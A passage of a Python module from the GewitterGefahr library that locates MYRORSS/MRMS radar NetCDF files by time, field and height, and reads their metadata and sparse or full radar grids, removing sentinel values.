from netCDF4 import Dataset
from gewittergefahr.gg_io import netcdf_io
from gewittergefahr.gg_utils import number_rounding as rounder
from gewittergefahr.gg_utils import time_conversion
from gewittergefahr.gg_utils import time_periods
from gewittergefahr.gg_utils import longitude_conversion as lng_conversion
from gewittergefahr.gg_utils import grids
from gewittergefahr.gg_utils import radar_utils
from gewittergefahr.gg_utils import myrorss_and_mrms_utils
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
# Names of global attributes / dimensions in the original (MYRORSS or MRMS)
# NetCDF files.
NW_GRID_POINT_LAT_COLUMN_ORIG = 'Latitude'
NW_GRID_POINT_LNG_COLUMN_ORIG = 'Longitude'
LAT_SPACING_COLUMN_ORIG = 'LatGridSpacing'
LNG_SPACING_COLUMN_ORIG = 'LonGridSpacing'
NUM_LAT_COLUMN_ORIG = 'Lat'
NUM_LNG_COLUMN_ORIG = 'Lon'
NUM_PIXELS_COLUMN_ORIG = 'pixel'
HEIGHT_COLUMN_ORIG = 'Height'
UNIX_TIME_COLUMN_ORIG = 'Time'
FIELD_NAME_COLUMN_ORIG = 'TypeName'
SENTINEL_VALUE_COLUMNS_ORIG = ['MissingData', 'RangeFolded']

# Column names in sparse-grid pandas DataFrames: GewitterGefahr names vs. the
# "_ORIG" NetCDF variable names they are read from.
GRID_ROW_COLUMN = 'grid_row'
GRID_COLUMN_COLUMN = 'grid_column'
NUM_GRID_CELL_COLUMN = 'num_grid_cells'
GRID_ROW_COLUMN_ORIG = 'pixel_x'
GRID_COLUMN_COLUMN_ORIG = 'pixel_y'
NUM_GRID_CELL_COLUMN_ORIG = 'pixel_count'

# Time formats used in file names and log messages.
TIME_FORMAT_SECONDS = '%Y%m%d-%H%M%S'
TIME_FORMAT_MINUTES = '%Y%m%d-%H%M'
TIME_FORMAT_FOR_LOG_MESSAGES = '%Y-%m-%d-%H%M%S'

# Glob-compatible character-class pattern matching TIME_FORMAT_SECONDS.
TIME_FORMAT_SECONDS_REGEX = (
    '[0-9][0-9][0-9][0-9][0-1][0-9][0-3][0-9]-[0-2][0-9][0-5][0-9][0-5][0-9]')

MINUTES_TO_SECONDS = 60
METRES_TO_KM = 1e-3

# Values within this tolerance of a sentinel value are treated as sentinels
# (see `_remove_sentinels_from_sparse_grid`, `_remove_sentinels_from_full_grid`).
SENTINEL_TOLERANCE = 10.

LATLNG_MULTIPLE_DEG = 1e-4

# Default max offsets (seconds) between desired and actual valid times, used
# by `find_raw_file_inexact_time` and `find_many_raw_files`.
DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC = 240
DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC = 180

ZIPPED_FILE_EXTENSION = '.gz'
UNZIPPED_FILE_EXTENSION = '.netcdf'

AZIMUTHAL_SHEAR_FIELD_NAMES = [
    radar_utils.LOW_LEVEL_SHEAR_NAME, radar_utils.MID_LEVEL_SHEAR_NAME]

# Keys in the dictionary returned by `find_many_raw_files`.
RADAR_FILE_NAMES_KEY = 'radar_file_name_matrix'
UNIQUE_TIMES_KEY = 'unique_times_unix_sec'
SPC_DATES_AT_UNIQUE_TIMES_KEY = 'spc_dates_at_unique_times_unix_sec'
FIELD_NAME_BY_PAIR_KEY = 'field_name_by_pair'
HEIGHT_BY_PAIR_KEY = 'height_by_pair_m_asl'
def _get_pathless_raw_file_pattern(unix_time_sec):
    """Generates glob pattern for the pathless name of a raw file.

    The time step is reduced to minute resolution, and the trailing wildcard
    allows the file to be either zipped or unzipped.  The pattern is meant
    for input to `glob.glob`.  This is the "pattern" counterpart of
    `_get_pathless_raw_file_name`.

    :param unix_time_sec: Valid time.
    :return: pathless_raw_file_pattern: Pathless glob pattern for raw file.
    """
    minute_string = time_conversion.unix_sec_to_string(
        unix_time_sec, TIME_FORMAT_MINUTES)

    return '{0:s}*{1:s}*'.format(minute_string, UNZIPPED_FILE_EXTENSION)
def _get_pathless_raw_file_name(unix_time_sec, zipped=True):
    """Generates pathless name for a raw file.

    :param unix_time_sec: Valid time.
    :param zipped: Boolean flag.  If True, will generate name for zipped
        (gzipped) file; if False, for unzipped file.
    :return: pathless_raw_file_name: Pathless name for raw file.
    """
    time_string = time_conversion.unix_sec_to_string(
        unix_time_sec, TIME_FORMAT_SECONDS)

    if zipped:
        return '{0:s}{1:s}{2:s}'.format(
            time_string, UNZIPPED_FILE_EXTENSION, ZIPPED_FILE_EXTENSION)

    return '{0:s}{1:s}'.format(time_string, UNZIPPED_FILE_EXTENSION)
def _remove_sentinels_from_sparse_grid(
        sparse_grid_table, field_name, sentinel_values):
    """Removes rows with sentinel values from a sparse grid.

    :param sparse_grid_table: pandas DataFrame with columns produced by
        `read_data_from_sparse_grid_file`.
    :param field_name: Name of radar field in GewitterGefahr format.
    :param sentinel_values: 1-D numpy array of sentinel values.
    :return: sparse_grid_table: Same as input, except that rows whose value is
        within SENTINEL_TOLERANCE of any sentinel are removed.
    """
    field_values = sparse_grid_table[field_name].values
    is_sentinel = numpy.full(len(sparse_grid_table.index), False, dtype=bool)

    for this_value in sentinel_values:
        is_sentinel = numpy.logical_or(
            is_sentinel,
            numpy.isclose(field_values, this_value, atol=SENTINEL_TOLERANCE)
        )

    rows_to_drop = sparse_grid_table.index[numpy.where(is_sentinel)[0]]
    return sparse_grid_table.drop(rows_to_drop, axis=0, inplace=False)
def _remove_sentinels_from_full_grid(field_matrix, sentinel_values):
    """Removes sentinel values from full grid.

    M = number of rows (unique grid-point latitudes)
    N = number of columns (unique grid-point longitudes)

    :param field_matrix: M-by-N numpy array with radar field.
    :param sentinel_values: 1-D numpy array of sentinel values.
    :return: field_matrix: Same as input, except that values within
        SENTINEL_TOLERANCE of any sentinel are replaced with NaN.  The input
        array is left unmodified.
    """
    num_grid_rows = field_matrix.shape[0]
    num_grid_columns = field_matrix.shape[1]

    # Work on a flat *copy*.  The original implementation assigned NaN into
    # the result of numpy.reshape, which is a view of the input whenever
    # possible -- so the caller's array was silently mutated in place.
    flat_field_matrix = numpy.ravel(field_matrix).copy()

    sentinel_flags = numpy.full(flat_field_matrix.size, False, dtype=bool)
    for this_sentinel_value in sentinel_values:
        these_sentinel_flags = numpy.isclose(
            flat_field_matrix, this_sentinel_value, atol=SENTINEL_TOLERANCE)
        sentinel_flags = numpy.logical_or(sentinel_flags, these_sentinel_flags)

    flat_field_matrix[numpy.where(sentinel_flags)[0]] = numpy.nan
    return numpy.reshape(
        flat_field_matrix, (num_grid_rows, num_grid_columns))
def get_relative_dir_for_raw_files(field_name, data_source, height_m_asl=None):
    """Generates relative path for raw files.

    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param height_m_asl: Radar height (metres above sea level).  Used only for
        reflectivity; for all other fields the single valid height is looked
        up from `radar_utils`.
    :return: relative_directory_name: Relative path for raw files.
    """
    if field_name == radar_utils.REFL_NAME:
        radar_utils.check_heights(
            data_source=data_source,
            heights_m_asl=numpy.array([height_m_asl]),
            field_name=radar_utils.REFL_NAME)
    else:
        height_m_asl = radar_utils.get_valid_heights(
            data_source=data_source, field_name=field_name)[0]

    field_name_orig = radar_utils.field_name_new_to_orig(
        field_name=field_name, data_source_name=data_source)

    return '{0:s}/{1:05.2f}'.format(
        field_name_orig, float(height_m_asl) * METRES_TO_KM)
def find_raw_file(
        unix_time_sec, spc_date_string, field_name, data_source,
        top_directory_name, height_m_asl=None, raise_error_if_missing=True):
    """Finds raw file.

    File should contain one field at one time step (e.g., MESH at 123502 UTC,
    reflectivity at 500 m above sea level and 123502 UTC).

    The zipped file is preferred; if it does not exist, this method falls back
    to the unzipped file.

    :param unix_time_sec: Valid time.
    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param raise_error_if_missing: Boolean flag.  If True and file is missing,
        this method will raise an error.  If False and file is missing, will
        return *expected* path to raw file.
    :return: raw_file_name: Path to raw file.
    :raises: ValueError: if raise_error_if_missing = True and file is missing.
    """
    # Error-checking.
    _ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
    error_checking.assert_is_string(top_directory_name)
    error_checking.assert_is_boolean(raise_error_if_missing)

    relative_directory_name = get_relative_dir_for_raw_files(
        field_name=field_name, height_m_asl=height_m_asl,
        data_source=data_source)

    directory_name = '{0:s}/{1:s}/{2:s}/{3:s}'.format(
        top_directory_name, spc_date_string[:4], spc_date_string,
        relative_directory_name
    )

    pathless_file_name = _get_pathless_raw_file_name(unix_time_sec, zipped=True)
    raw_file_name = '{0:s}/{1:s}'.format(directory_name, pathless_file_name)

    if not os.path.isfile(raw_file_name):
        # Fall back to the unzipped file.  (The original implementation
        # checked existence only when raise_error_if_missing was True, so an
        # existing unzipped file was never returned in the False case.)
        pathless_file_name = _get_pathless_raw_file_name(
            unix_time_sec, zipped=False)
        unzipped_file_name = '{0:s}/{1:s}'.format(
            directory_name, pathless_file_name)

        if os.path.isfile(unzipped_file_name):
            return unzipped_file_name

        if raise_error_if_missing:
            raise ValueError(
                'Cannot find raw file. Expected at: "{0:s}"'.format(
                    unzipped_file_name)
            )

    # Neither file exists and errors are suppressed: return the *expected*
    # (zipped) path, matching the documented contract.
    return raw_file_name
def raw_file_name_to_time(raw_file_name):
    """Parses valid time from the name of a raw file.

    :param raw_file_name: Path to raw file.
    :return: unix_time_sec: Valid time.
    """
    error_checking.assert_is_string(raw_file_name)

    pathless_file_name = os.path.split(raw_file_name)[-1]

    # Strip both extensions ("%s.netcdf.gz" or "%s.netcdf"), leaving only the
    # time string.
    time_string = pathless_file_name.replace(
        ZIPPED_FILE_EXTENSION, '').replace(UNZIPPED_FILE_EXTENSION, '')

    return time_conversion.string_to_unix_sec(time_string, TIME_FORMAT_SECONDS)
def find_raw_file_inexact_time(
        desired_time_unix_sec, spc_date_string, field_name, data_source,
        top_directory_name, height_m_asl=None, max_time_offset_sec=None,
        raise_error_if_missing=False):
    """Finds raw file at inexact time.

    If you know the exact valid time, use `find_raw_file`.

    :param desired_time_unix_sec: Desired valid time.
    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Field name in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param max_time_offset_sec: Maximum offset between actual and desired valid
        time.  For example, if `desired_time_unix_sec` is 162933 UTC 5 Jan 2018
        and `max_time_offset_sec` = 60, this method will look for az-shear at
        valid times from 162833...163033 UTC 5 Jan 2018.  If None, this
        defaults to `DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC` for
        azimuthal-shear fields and `DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC`
        for all other fields.
    :param raise_error_if_missing: Boolean flag.  If no file is found and
        raise_error_if_missing = True, this method will error out.  If no file
        is found and raise_error_if_missing = False, will return None.
    :return: raw_file_name: Path to raw file.
    :raises: ValueError: if no file is found and raise_error_if_missing = True.
    """
    # Error-checking.
    error_checking.assert_is_integer(desired_time_unix_sec)
    _ = time_conversion.spc_date_string_to_unix_sec(spc_date_string)
    error_checking.assert_is_boolean(raise_error_if_missing)
    radar_utils.check_field_name(field_name)
    # Azimuthal-shear files are produced less frequently, hence get a larger
    # default search window.
    if max_time_offset_sec is None:
        if field_name in AZIMUTHAL_SHEAR_FIELD_NAMES:
            max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC
        else:
            max_time_offset_sec = DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC
    error_checking.assert_is_integer(max_time_offset_sec)
    error_checking.assert_is_greater(max_time_offset_sec, 0)
    # Floor both ends of the search window to whole minutes, because raw file
    # names are globbed at minute resolution (see
    # `_get_pathless_raw_file_pattern`).
    first_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
        float(desired_time_unix_sec - max_time_offset_sec),
        MINUTES_TO_SECONDS)))
    last_allowed_minute_unix_sec = numpy.round(int(rounder.floor_to_nearest(
        float(desired_time_unix_sec + max_time_offset_sec),
        MINUTES_TO_SECONDS)))
    allowed_minutes_unix_sec = time_periods.range_and_interval_to_list(
        start_time_unix_sec=first_allowed_minute_unix_sec,
        end_time_unix_sec=last_allowed_minute_unix_sec,
        time_interval_sec=MINUTES_TO_SECONDS, include_endpoint=True).astype(int)
    relative_directory_name = get_relative_dir_for_raw_files(
        field_name=field_name, data_source=data_source,
        height_m_asl=height_m_asl)
    # Collect every candidate file in the window, one glob per minute.
    raw_file_names = []
    for this_time_unix_sec in allowed_minutes_unix_sec:
        this_pathless_file_pattern = _get_pathless_raw_file_pattern(
            this_time_unix_sec)
        this_file_pattern = '{0:s}/{1:s}/{2:s}/{3:s}/{4:s}'.format(
            top_directory_name, spc_date_string[:4], spc_date_string,
            relative_directory_name, this_pathless_file_pattern
        )
        raw_file_names += glob.glob(this_file_pattern)
    # Parse the valid time of each candidate from its file name.
    file_times_unix_sec = []
    for this_raw_file_name in raw_file_names:
        file_times_unix_sec.append(raw_file_name_to_time(this_raw_file_name))
    # Pick the candidate nearest to the desired time; with no candidates,
    # an infinite "difference" forces the not-found branch below.
    if len(file_times_unix_sec):
        file_times_unix_sec = numpy.array(file_times_unix_sec)
        time_differences_sec = numpy.absolute(
            file_times_unix_sec - desired_time_unix_sec)
        nearest_index = numpy.argmin(time_differences_sec)
        min_time_diff_sec = time_differences_sec[nearest_index]
    else:
        min_time_diff_sec = numpy.inf
    if min_time_diff_sec > max_time_offset_sec:
        if raise_error_if_missing:
            desired_time_string = time_conversion.unix_sec_to_string(
                desired_time_unix_sec, TIME_FORMAT_FOR_LOG_MESSAGES)
            error_string = (
                'Could not find "{0:s}" file within {1:d} seconds of {2:s}.'
            ).format(field_name, max_time_offset_sec, desired_time_string)
            raise ValueError(error_string)
        return None
    return raw_file_names[nearest_index]
def find_raw_files_one_spc_date(
        spc_date_string, field_name, data_source, top_directory_name,
        height_m_asl=None, raise_error_if_missing=True):
    """Finds raw files for one field and one SPC date.

    :param spc_date_string: SPC date (format "yyyymmdd").
    :param field_name: Name of radar field in GewitterGefahr format.
    :param data_source: Data source (string).
    :param top_directory_name: Name of top-level directory with raw files.
    :param height_m_asl: Radar height (metres above sea level).
    :param raise_error_if_missing: Boolean flag.  If True and no files are
        found, will raise error.
    :return: raw_file_names: 1-D list of paths to raw files.
    :raises: ValueError: if raise_error_if_missing = True and no files are
        found.
    """
    error_checking.assert_is_boolean(raise_error_if_missing)

    example_time_unix_sec = time_conversion.spc_date_string_to_unix_sec(
        spc_date_string)

    # Build the *expected* path of one file on this SPC date, then turn its
    # name into a glob pattern matching any time on the date, zipped or not.
    example_file_name = find_raw_file(
        unix_time_sec=example_time_unix_sec, spc_date_string=spc_date_string,
        field_name=field_name, data_source=data_source,
        top_directory_name=top_directory_name, height_m_asl=height_m_asl,
        raise_error_if_missing=False)

    directory_name, pathless_example_name = os.path.split(example_file_name)
    example_time_string = time_conversion.unix_sec_to_string(
        example_time_unix_sec, TIME_FORMAT_SECONDS)

    pathless_pattern = pathless_example_name.replace(
        example_time_string, TIME_FORMAT_SECONDS_REGEX)
    pathless_pattern = pathless_pattern.replace(ZIPPED_FILE_EXTENSION, '*')

    raw_file_pattern = '{0:s}/{1:s}'.format(directory_name, pathless_pattern)
    raw_file_names = glob.glob(raw_file_pattern)

    if raw_file_names or not raise_error_if_missing:
        return raw_file_names

    raise ValueError(
        'Could not find any files with the following pattern: {0:s}'.format(
            raw_file_pattern)
    )
def find_many_raw_files(
        desired_times_unix_sec, spc_date_strings, data_source, field_names,
        top_directory_name, reflectivity_heights_m_asl=None,
        max_time_offset_for_az_shear_sec=
        DEFAULT_MAX_TIME_OFFSET_FOR_AZ_SHEAR_SEC,
        max_time_offset_for_non_shear_sec=
        DEFAULT_MAX_TIME_OFFSET_FOR_NON_SHEAR_SEC):
    """Finds raw file for each field/height pair and time step.

    N = number of input times
    T = number of unique input times
    F = number of field/height pairs

    :param desired_times_unix_sec: length-N numpy array with desired valid
        times.
    :param spc_date_strings: length-N list of corresponding SPC dates (format
        "yyyymmdd").
    :param data_source: Data source ("myrorss" or "mrms").
    :param field_names: 1-D list of field names.
    :param top_directory_name: Name of top-level directory with radar data from
        the given source.
    :param reflectivity_heights_m_asl: 1-D numpy array of heights (metres above
        sea level) for the field "reflectivity_dbz".  If "reflectivity_dbz" is
        not in `field_names`, leave this as None.
    :param max_time_offset_for_az_shear_sec: Max time offset (between desired
        and actual valid time) for azimuthal-shear fields.
    :param max_time_offset_for_non_shear_sec: Max time offset (between desired
        and actual valid time) for non-azimuthal-shear fields.
    :return: file_dictionary: Dictionary with the following keys.
    file_dictionary['radar_file_name_matrix']: T-by-F numpy array of paths to
        raw files.
    file_dictionary['unique_times_unix_sec']: length-T numpy array of unique
        valid times.
    file_dictionary['spc_dates_at_unique_times_unix_sec']: length-T numpy array
        of corresponding SPC dates.
    file_dictionary['field_name_by_pair']: length-F list of field names.
    file_dictionary['height_by_pair_m_asl']: length-F numpy array of heights
        (metres above sea level).
    """
    field_name_by_pair, height_by_pair_m_asl = (
        myrorss_and_mrms_utils.fields_and_refl_heights_to_pairs(
            field_names=field_names, data_source=data_source,
            refl_heights_m_asl=reflectivity_heights_m_asl)
    )
    num_fields = len(field_name_by_pair)

    error_checking.assert_is_integer_numpy_array(desired_times_unix_sec)
    error_checking.assert_is_numpy_array(
        desired_times_unix_sec, num_dimensions=1)
    num_times = len(desired_times_unix_sec)

    error_checking.assert_is_string_list(spc_date_strings)
    error_checking.assert_is_numpy_array(
        numpy.array(spc_date_strings),
        exact_dimensions=numpy.array([num_times]))

    spc_dates_unix_sec = numpy.array(
        [time_conversion.spc_date_string_to_unix_sec(s)
         for s in spc_date_strings])

    # Pair each valid time with its SPC date, then deduplicate the pairs.
    # `numpy.unique(..., axis=0)` replaces the original vstack-over-a-set,
    # which relied on non-deterministic set ordering and passed a non-sequence
    # to vstack (deprecated, and an error in newer numpy versions).
    time_matrix = numpy.hstack((
        numpy.reshape(desired_times_unix_sec, (num_times, 1)),
        numpy.reshape(spc_dates_unix_sec, (num_times, 1))
    ))
    unique_time_matrix = numpy.unique(time_matrix, axis=0).astype(int)

    unique_times_unix_sec = unique_time_matrix[:, 0]
    spc_dates_at_unique_times_unix_sec = unique_time_matrix[:, 1]

    # `numpy.unique` already sorts rows lexicographically (i.e., by time
    # first), but the explicit sort is kept for clarity and safety.
    sort_indices = numpy.argsort(unique_times_unix_sec)
    unique_times_unix_sec = unique_times_unix_sec[sort_indices]
    spc_dates_at_unique_times_unix_sec = spc_dates_at_unique_times_unix_sec[
        sort_indices]

    num_unique_times = len(unique_times_unix_sec)
    radar_file_name_matrix = numpy.full(
        (num_unique_times, num_fields), '', dtype=object)

    for i in range(num_unique_times):
        this_spc_date_string = time_conversion.time_to_spc_date_string(
            spc_dates_at_unique_times_unix_sec[i])

        for j in range(num_fields):
            # Azimuthal shear may legitimately be missing (larger offsets,
            # warn instead of raising); other fields must be found.
            if field_name_by_pair[j] in AZIMUTHAL_SHEAR_FIELD_NAMES:
                this_max_time_offset_sec = max_time_offset_for_az_shear_sec
                this_raise_error_flag = False
            else:
                this_max_time_offset_sec = max_time_offset_for_non_shear_sec
                this_raise_error_flag = True

            if this_max_time_offset_sec == 0:
                radar_file_name_matrix[i, j] = find_raw_file(
                    unix_time_sec=unique_times_unix_sec[i],
                    spc_date_string=this_spc_date_string,
                    field_name=field_name_by_pair[j], data_source=data_source,
                    top_directory_name=top_directory_name,
                    height_m_asl=height_by_pair_m_asl[j],
                    raise_error_if_missing=this_raise_error_flag)
            else:
                radar_file_name_matrix[i, j] = find_raw_file_inexact_time(
                    desired_time_unix_sec=unique_times_unix_sec[i],
                    spc_date_string=this_spc_date_string,
                    field_name=field_name_by_pair[j], data_source=data_source,
                    top_directory_name=top_directory_name,
                    height_m_asl=height_by_pair_m_asl[j],
                    max_time_offset_sec=this_max_time_offset_sec,
                    raise_error_if_missing=this_raise_error_flag)

            if radar_file_name_matrix[i, j] is None:
                this_time_string = time_conversion.unix_sec_to_string(
                    unique_times_unix_sec[i], TIME_FORMAT_FOR_LOG_MESSAGES)

                warning_string = (
                    'Cannot find file for "{0:s}" at {1:d} metres ASL and '
                    '{2:s}.'
                ).format(
                    field_name_by_pair[j], int(height_by_pair_m_asl[j]),
                    this_time_string
                )
                warnings.warn(warning_string)

    return {
        RADAR_FILE_NAMES_KEY: radar_file_name_matrix,
        UNIQUE_TIMES_KEY: unique_times_unix_sec,
        SPC_DATES_AT_UNIQUE_TIMES_KEY: spc_dates_at_unique_times_unix_sec,
        FIELD_NAME_BY_PAIR_KEY: field_name_by_pair,
        HEIGHT_BY_PAIR_KEY: numpy.round(height_by_pair_m_asl).astype(int)
    }
def read_metadata_from_raw_file(
        netcdf_file_name, data_source, raise_error_if_fails=True):
    """Reads metadata from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param data_source: Data source (string).
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be
        read, this method will raise an error.  If False and file cannot be
        read, will return None.
    :return: metadata_dict: Dictionary with the following keys.
    metadata_dict['nw_grid_point_lat_deg']: Latitude (deg N) of
        northwesternmost grid point.
    metadata_dict['nw_grid_point_lng_deg']: Longitude (deg E) of
        northwesternmost grid point.
    metadata_dict['lat_spacing_deg']: Spacing (deg N) between meridionally
        adjacent grid points.
    metadata_dict['lng_spacing_deg']: Spacing (deg E) between zonally adjacent
        grid points.
    metadata_dict['num_lat_in_grid']: Number of rows (unique grid-point
        latitudes).
    metadata_dict['num_lng_in_grid']: Number of columns (unique grid-point
        longitudes).
    metadata_dict['height_m_asl']: Radar height (metres above sea level).
    metadata_dict['unix_time_sec']: Valid time.
    metadata_dict['field_name']: Name of radar field in GewitterGefahr format.
    metadata_dict['field_name_orig']: Name of radar field in original (either
        MYRORSS or MRMS) format.
    metadata_dict['sentinel_values']: 1-D numpy array of sentinel values.
    """
    error_checking.assert_file_exists(netcdf_file_name)
    netcdf_dataset = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    # `open_netcdf` returns None on failure when raise_error_if_fails=False.
    if netcdf_dataset is None:
        return None
    field_name_orig = str(getattr(netcdf_dataset, FIELD_NAME_COLUMN_ORIG))
    # Grid geometry and valid time are stored as global attributes; grid
    # dimensions come from the NetCDF dimension sizes.
    metadata_dict = {
        radar_utils.NW_GRID_POINT_LAT_COLUMN:
            getattr(netcdf_dataset, NW_GRID_POINT_LAT_COLUMN_ORIG),
        radar_utils.NW_GRID_POINT_LNG_COLUMN:
            lng_conversion.convert_lng_positive_in_west(
                getattr(netcdf_dataset, NW_GRID_POINT_LNG_COLUMN_ORIG),
                allow_nan=False),
        radar_utils.LAT_SPACING_COLUMN:
            getattr(netcdf_dataset, LAT_SPACING_COLUMN_ORIG),
        radar_utils.LNG_SPACING_COLUMN:
            getattr(netcdf_dataset, LNG_SPACING_COLUMN_ORIG),
        # NOTE(review): stored dimension size is apparently one less than the
        # number of grid points along each axis; the +1 recovers the full
        # count -- confirm against the raw-file spec.
        radar_utils.NUM_LAT_COLUMN:
            netcdf_dataset.dimensions[NUM_LAT_COLUMN_ORIG].size + 1,
        radar_utils.NUM_LNG_COLUMN:
            netcdf_dataset.dimensions[NUM_LNG_COLUMN_ORIG].size + 1,
        radar_utils.HEIGHT_COLUMN:
            getattr(netcdf_dataset, HEIGHT_COLUMN_ORIG),
        radar_utils.UNIX_TIME_COLUMN:
            getattr(netcdf_dataset, UNIX_TIME_COLUMN_ORIG),
        FIELD_NAME_COLUMN_ORIG: field_name_orig,
        radar_utils.FIELD_NAME_COLUMN: radar_utils.field_name_orig_to_new(
            field_name_orig=field_name_orig, data_source_name=data_source)
    }
    latitude_spacing_deg = metadata_dict[radar_utils.LAT_SPACING_COLUMN]
    longitude_spacing_deg = metadata_dict[radar_utils.LNG_SPACING_COLUMN]
    # TODO(thunderhoser): The following "if" condition is a hack.  The purpose
    # is to change grid corners only for actual MYRORSS data, not GridRad data
    # in MYRORSS format.
    if latitude_spacing_deg < 0.011 and longitude_spacing_deg < 0.011:
        # Snap the NW corner onto the grid defined by the spacing (floor for
        # latitude, ceiling for longitude, i.e. move towards the grid
        # interior).
        metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] = (
            rounder.floor_to_nearest(
                metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
                metadata_dict[radar_utils.LAT_SPACING_COLUMN]))
        metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN] = (
            rounder.ceiling_to_nearest(
                metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
                metadata_dict[radar_utils.LNG_SPACING_COLUMN]))
    # Sentinel values (e.g., missing data, range folding) are stored as
    # global attributes.
    sentinel_values = []
    for this_column in SENTINEL_VALUE_COLUMNS_ORIG:
        sentinel_values.append(getattr(netcdf_dataset, this_column))
    metadata_dict.update({
        radar_utils.SENTINEL_VALUE_COLUMN: numpy.array(sentinel_values)})
    netcdf_dataset.close()
    return metadata_dict
def read_data_from_sparse_grid_file(
        netcdf_file_name, field_name_orig, data_source, sentinel_values,
        raise_error_if_fails=True):
    """Reads sparse radar grid from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param field_name_orig: Name of radar field in original (either MYRORSS or
        MRMS) format.
    :param data_source: Data source (string).
    :param sentinel_values: 1-D numpy array of sentinel values.
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be
        read, this method will raise an error.  If False and file cannot be
        read, will return None.
    :return: sparse_grid_table: pandas DataFrame, one row per grid point, with
        the following columns.
    sparse_grid_table.grid_row: Row index.
    sparse_grid_table.grid_column: Column index.
    sparse_grid_table.<field_name>: Radar measurement (column name is the
        GewitterGefahr version of `field_name_orig`).
    sparse_grid_table.num_grid_cells: Number of consecutive grid points
        (row-major order) with the same radar measurement.
    """
    error_checking.assert_file_exists(netcdf_file_name)
    error_checking.assert_is_numpy_array_without_nan(sentinel_values)
    error_checking.assert_is_numpy_array(sentinel_values, num_dimensions=1)

    netcdf_dataset = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    if netcdf_dataset is None:
        return None

    field_name = radar_utils.field_name_orig_to_new(
        field_name_orig=field_name_orig, data_source_name=data_source)

    if len(netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG]) == 0:
        # The file stores no pixels at all; build an empty table.
        sparse_grid_dict = {
            GRID_ROW_COLUMN: numpy.array([], dtype=int),
            GRID_COLUMN_COLUMN: numpy.array([], dtype=int),
            NUM_GRID_CELL_COLUMN: numpy.array([], dtype=int),
            field_name: numpy.array([])}
    else:
        sparse_grid_dict = {
            GRID_ROW_COLUMN: netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:],
            GRID_COLUMN_COLUMN:
                netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:],
            NUM_GRID_CELL_COLUMN:
                netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:],
            field_name: netcdf_dataset.variables[field_name_orig][:]}

    netcdf_dataset.close()

    return _remove_sentinels_from_sparse_grid(
        pandas.DataFrame.from_dict(sparse_grid_dict), field_name=field_name,
        sentinel_values=sentinel_values)
def read_data_from_full_grid_file(
        netcdf_file_name, metadata_dict, raise_error_if_fails=True):
    """Reads full radar grid from raw (either MYRORSS or MRMS) file.

    This file should contain one radar field at one height and valid time.

    :param netcdf_file_name: Path to input file.
    :param metadata_dict: Dictionary created by `read_metadata_from_raw_file`.
    :param raise_error_if_fails: Boolean flag.  If True and file cannot be
        read, this method will raise an error.  If False and file cannot be
        read, will return None for all output vars.
    :return: field_matrix: M-by-N numpy array with radar field.  Latitude
        increases while moving up each column, and longitude increases while
        moving right along each row.
    :return: grid_point_latitudes_deg: length-M numpy array of grid-point
        latitudes (deg N).  This array is monotonically decreasing.
    :return: grid_point_longitudes_deg: length-N numpy array of grid-point
        longitudes (deg E).  This array is monotonically increasing.
    """
    error_checking.assert_file_exists(netcdf_file_name)
    netcdf_dataset = netcdf_io.open_netcdf(
        netcdf_file_name, raise_error_if_fails)
    # `open_netcdf` returns None on failure when raise_error_if_fails=False.
    if netcdf_dataset is None:
        return None, None, None
    # The variable holding the field is named after the original
    # (MYRORSS/MRMS) field name stored in the metadata.
    field_matrix = netcdf_dataset.variables[
        metadata_dict[FIELD_NAME_COLUMN_ORIG]]
    netcdf_dataset.close()
    # Metadata gives the *northwest* corner; derive the minimum (southernmost)
    # latitude to anchor the lat-long grid.
    min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
        metadata_dict[radar_utils.LAT_SPACING_COLUMN] * (
            metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
    grid_point_latitudes_deg, grid_point_longitudes_deg = (
        grids.get_latlng_grid_points(
            min_latitude_deg=min_latitude_deg,
            min_longitude_deg=
            metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
            lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
            lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
            num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
            num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
    field_matrix = _remove_sentinels_from_full_grid(
        field_matrix, metadata_dict[radar_utils.SENTINEL_VALUE_COLUMN])
    # Flip the field matrix and reverse the latitude array so the two agree:
    # latitudes returned in decreasing order, per the docstring contract.
